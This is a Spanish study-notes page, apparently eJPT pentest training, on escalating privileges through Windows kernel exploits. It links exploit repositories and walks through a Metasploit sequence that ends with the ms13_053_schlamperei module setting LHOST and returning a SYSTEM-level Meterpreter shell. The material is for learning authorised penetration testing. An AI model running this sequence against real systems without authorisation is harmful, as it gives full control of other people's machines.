> For the complete documentation index, see [llms.txt](https://4lec4st.gitbook.io/4lec4st/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://4lec4st.gitbook.io/4lec4st/ejpt-notes/pruebas-de-penetracion-de-host-y-red/ataques-basados-en-sistema-host/windows/escalada-de-privilegios-en-windows/exploits-del-kernel-de-windows.md).

# Exploits del kernel de Windows

### 🔍 ¿Qué es la escalada de privilegios?

La **escalada de privilegios** es el proceso de explotar **vulnerabilidades** o **configuraciones incorrectas** en un sistema para elevar los privilegios del usuario actual, típicamente con el objetivo de obtener acceso como **administrador o SYSTEM/root**.

🔑 Es una parte **crítica** en el ciclo de vida de un ataque y uno de los factores más importantes en el éxito de una auditoría de seguridad.

***

### 🧗‍♂️ ¿Cuándo se realiza?

Después de obtener un **acceso inicial** en el sistema (por ejemplo, con una shell de bajo nivel), será necesario **escalar privilegios** para poder:

* Ejecutar comandos privilegiados.
* Manipular servicios del sistema.
* Extraer credenciales.
* Persistir el acceso o pivotar hacia otros objetivos.

***

### 🧠 ¿Por qué es tan importante?

👉 Dominar la escalada de privilegios te distingue como un buen pentester.\
👉 Permite convertir una simple shell de usuario en **acceso total al sistema**.

***

### 🧬 Introducción al Kernel de Windows

El **kernel** es el núcleo del sistema operativo, el encargado de controlar todo el hardware y recursos del sistema.

* 🧑‍💻 **Modo Usuario** → Acceso limitado.
* 🧠 **Modo Kernel** → Acceso completo (administrador/SYSTEM).

#### 🔹 Kernel de Windows

* El kernel de Windows se llama **Windows NT**.
* Todas las versiones modernas de Windows lo utilizan.
* Interactúa entre hardware y software.

***

### 💥 Explotación del Kernel en Windows

Los exploits de kernel se aprovechan de **vulnerabilidades en el núcleo del sistema** para:

* Ejecutar código arbitrario.
* Elevar privilegios al nivel SYSTEM.

🧭 El proceso varía según la versión de Windows y el exploit usado.

#### 🧪 Metodología común:

1. 📌 Identificar vulnerabilidades del kernel.
2. 📥 Descargar y compilar el exploit.
3. 📤 Transferirlo al sistema víctima.
4. 🚀 Ejecutar y escalar privilegios.

***

### 🛠️ Herramientas útiles

#### 🔎 Windows Exploit Suggester

Compara los parches instalados en el sistema contra una base de datos de Microsoft para detectar **actualizaciones faltantes** que pueden ser explotables.

📍 GitHub:\
<https://github.com/AonCyberLabs/Windows-Exploit-Suggester>

***

#### 📚 Windows Kernel Exploits

Repositorio con exploits del kernel de Windows, organizados por CVE.

📍 GitHub:\
<https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS16-135>

***

### ⚙️ Explotación del Kernel con Metasploit

Una vez que tienes acceso inicial (por ejemplo, una **meterpreter shell** de un usuario con bajos privilegios), puedes usar Metasploit para intentar escalar privilegios con un exploit de kernel vulnerable.

> ⚠️ Asegúrate de conocer el sistema operativo y la arquitectura del objetivo. Usa `sysinfo` y `getuid` desde Meterpreter.

***

#### 🪜 Paso 1: Verificar información del sistema

En tu sesión de Meterpreter:

```bash
meterpreter > sysinfo
meterpreter > getuid
```

Esto te dirá la versión de Windows y el usuario actual. Por ejemplo:

```bash
Computer        : VICTIMA
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x64
Meterpreter     : x86/windows
```

***

#### 🔍 Paso 2: Buscar exploits disponibles

Puedes usar `post/multi/recon/local_exploit_suggester` para listar posibles exploits locales:

```bash
use post/multi/recon/local_exploit_suggester
set SESSION <ID>
run
```

🔎 Esto te sugerirá exploits disponibles para la versión detectada. Toma nota del módulo sugerido, por ejemplo:

```bash
[*] Suggested Exploit: exploit/windows/local/ms13_053_schlamperei
```

***

#### 💣 Paso 3: Ejecutar el exploit

Ahora ejecutamos el módulo sugerido:

```bash
use exploit/windows/local/ms13_053_schlamperei
set SESSION <ID>
set LHOST <tu_IP_local>
exploit
```

Si todo va bien, obtendrás una nueva **Meterpreter shell con privilegios SYSTEM**:

```bash
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
```

🎯 ¡Escalada de privilegios completada!
